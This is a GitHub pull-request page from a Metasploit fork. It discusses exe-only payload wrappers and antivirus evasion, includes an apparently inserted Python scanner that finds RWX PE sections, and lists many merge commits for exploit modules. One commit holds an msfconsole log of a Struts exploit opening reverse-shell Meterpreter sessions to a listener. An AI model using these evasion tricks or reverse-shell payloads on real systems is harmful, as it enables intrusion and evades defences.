Exe only patch #1

Merged
merged 3 commits into from Mar 18, 2013


todb-r7 commented Mar 18, 2013

This fixes up the branch referenced by #904, so it no longer suffers from merge conflicts.

More importantly -- I'm not super comfortable about changing the default behavior of the VBS, ASP, and ASPX wrappers for the exe generators, mainly because I haven't seen anything compelling that says that these mechanisms should favor this new method.

When exe-small was introduced, these wrappers weren't updated to use them. Maybe it was an oversight, and maybe it was caution.

I think that kind of investigation should happen for sure, and then default behavior can get changed around. In the meantime, for people who want to use this payload type, they still can (as @rsmudge did in his examples).

So, tl;dr: more testing to prove that the AV evasion benefits are actually there, and more testing to prove that the wrappers aren't suddenly busted, if you please.

@todb-r7 todb-r7 referenced this pull request in rapid7/metasploit-framework Mar 18, 2013

Merged

added exe-only options to win32pe generation #904


agix commented Mar 18, 2013

Oh nice, thank you! For testing, I use it with a custom encoder with anti-emulation tricks and I have no more problems with AV (even with the shikata_ga_nai encoder). The detection is just related to the encoder/shellcode with this patch.
But the RWX section characteristics could be used to detect it, even if I think it's a crazy detection condition (a lot of false positives...)
So I'm now scanning all the PEs in C:\Windows\ looking for an RWX section... If I find one, AV couldn't use only this characteristic to catch a virus, because it would catch native Windows binaries too...
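The check agix describes, as an added example that is not code from this PR or from Metasploit: parse the PE section table, flag any section whose characteristics are readable, writable and executable at once, and walk a directory (for instance C:\Windows) to measure how many legitimate binaries trip the same heuristic. The sample image is a minimal PE constructed in memory (no optional header) purely so the parser can be run offline.

```python
import struct
from pathlib import Path

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE  # all three bits set at once

def pe_sections(data):
    """Parse a PE image and return [(section_name, characteristics)] from the section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]           # offset of the PE signature
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4                                          # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]      # SizeOfOptionalHeader
    table = coff + 20 + opt_size                                 # section table follows it
    sections = []
    for i in range(num_sections):
        off = table + i * 40                                     # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]      # Characteristics field
        sections.append((name, chars))
    return sections

def rwx_sections(data):
    """Names of sections that are mapped readable, writable and executable together."""
    return [name for name, chars in pe_sections(data) if chars & RWX == RWX]

def scan_directory(root):
    """Walk root for .exe/.dll files; map each file with an RWX section to the section names."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in (".exe", ".dll") or not path.is_file():
            continue
        try:
            names = rwx_sections(path.read_bytes())
        except (OSError, ValueError, struct.error):
            continue                                             # unreadable or not a valid PE
        if names:
            hits[str(path)] = names
    return hits

def build_sample():
    """Constructed minimal PE: one RX code section (.text) and one RWX data section (.rwx)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0)      # i386, 2 sections, no optional header
    def sec(name, chars):
        return struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, chars)
    return dos + b"PE\0\0" + coff + sec(b".text", 0x60000020) + sec(b".rwx", 0xE0000040)
```

Running `scan_directory(r"C:\Windows")` on a real system is the false-positive measurement agix is doing: every native binary it reports is a reason an AV engine cannot rely on this characteristic alone.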

agix added a commit that referenced this pull request Mar 18, 2013

Merge pull request #1 from todb-r7/exe_only_patch
Exe only patch : avoid merge conflict and don't use win32pe_only everywhere by default.

@agix agix merged commit e3c5303 into agix:exe_only_patch Mar 18, 2013

agix pushed a commit that referenced this pull request Mar 27, 2013

Merge pull request #1 from jvazquez-r7/sonicwall_test
assuring stdapi loads on meterpreter

agix pushed a commit that referenced this pull request Mar 27, 2013

Merge pull request #1 from jvazquez-r7/persistence_vbs
using always a vbs file to drop exe

agix pushed a commit that referenced this pull request Mar 27, 2013

Merge pull request #1 from jvazquez-r7/devise_clean
This is all just formatting, ref additions, etc.  Nothing substantial so I'll just merge and test as I'm trying to figure out what's up with failing on @rvazquez-r7's app.

agix pushed a commit that referenced this pull request Mar 30, 2013

Merge pull request #1 from todb-r7/feature/loot-manipulation
Make it clear that you're deleting all loot

agix pushed a commit that referenced this pull request Mar 30, 2013

Merge pull request #1 from jvazquez-r7/injector_docx_post
testing completed. I see no issues with the proposed changes, tempfiles and quickfile work fine.

agix pushed a commit that referenced this pull request May 12, 2013

Merge pull request #1 from jvazquez-r7/nagios_nrpe_work
cleanup for nagios_nrpe_arguments

agix pushed a commit that referenced this pull request Jun 27, 2013

Merge pull request #1 from wchen-r7/pr1856_target_fix
Fix #1856 - Target selection and swf path

agix pushed a commit that referenced this pull request Jun 27, 2013

Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```

agix pushed a commit that referenced this pull request Jun 27, 2013

Merge pull request #1 from jvazquez-r7/rfcode_work
Final cleanup for rfcode_reader_enum

agix pushed a commit that referenced this pull request Aug 20, 2013

Merge pull request #1 from jvazquez-r7/instantcms
Improve and clean instantcms_exec

agix pushed a commit that referenced this pull request Aug 20, 2013

Merge pull request #1 from CharlieEriksen/squash-rce
Adding Squash RCE exploit module

agix pushed a commit that referenced this pull request Sep 10, 2013

Merge pull request #1 from Meatballs1/pr/2270
Refactor and fixes

Added all of Meatball's awesome fixes.

agix pushed a commit that referenced this pull request Nov 17, 2013

Merge pull request #1 from jvennix-r7/locked_pref_panel_dry
Clean up timeout logic and update description

agix pushed a commit that referenced this pull request Nov 17, 2013

Merge pull request #1 from todb-r7/land-2414
Disambiguate tape_engine_8A as tape_engine_0x8a

agix pushed a commit that referenced this pull request Jan 6, 2014

Merge pull request #1 from jvazquez-r7/land_2711
Clean php_wordpress_optimizepress

agix pushed a commit that referenced this pull request Jan 6, 2014

Merge pull request #1 from wchen-r7/poison_ivy_ports_check
Add an input check for datastore option PORTS

agix pushed a commit that referenced this pull request Mar 6, 2014

Merge pull request #1 from tabassassin/retab/pr/2307
Retab/pr/2307 landed as requested.

agix pushed a commit that referenced this pull request Mar 6, 2014

Merge pull request #1 from jvazquez-r7/review-2801
Review IBM Lotus Sametime modules

agix pushed a commit that referenced this pull request Apr 13, 2014

staaldraad
Merge pull request #1 from Meatballs1/pr2107
Refactor to common post module

agix pushed a commit that referenced this pull request Sep 12, 2014

Merge pull request #1 from todb-r7/fix-pr3570
Revert "change to .gitignore"

agix pushed a commit that referenced this pull request Sep 12, 2014

Merge pull request #1 from rapid7/master
I wonder if this PR will work.

agix pushed a commit that referenced this pull request Nov 3, 2014

Merge pull request #1 from jhart-r7/landing-3992-jhart-fixes
Refactor hp_enum_perfd for better looting

agix pushed a commit that referenced this pull request Nov 3, 2014

Merge pull request #1 from jhart-r7/landing-4004-jhart
Refactoring of LastPass post module

agix pushed a commit that referenced this pull request Nov 3, 2014

Merge pull request #1 from zeroSteiner/fix-pr4020-login
Retry the script page request to get the token

agix pushed a commit that referenced this pull request Nov 3, 2014

Merge pull request #1 from jhart-r7/landing-4003-jhart
Cleanup.  Sanity check in setup.  vprint

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from jhart-r7/landing-4229-jhart
Minor Ruby style and module usability cleanup

agix pushed a commit that referenced this pull request Jan 5, 2015

rwhitcroft
Merge pull request #1 from hmoore-r7/smtp_ntlm_domain
Module cleanup, error handling, and reporting

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from jhart-r7/landing-4265-jhart
This is a great intermediate approach, thanks @jhart-r7 ! Will verify Pro and msfconsole cases momentarily.

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from jvazquez-r7/update_3305
Make Cisco SSL VPN Privilege Escalation landable

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from jhart-r7/landing-4328
Minor improvements to actual analyzer ant cookie exploit

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from wvu-r7/pr/4361
Merging changes. Thanks for all the help!
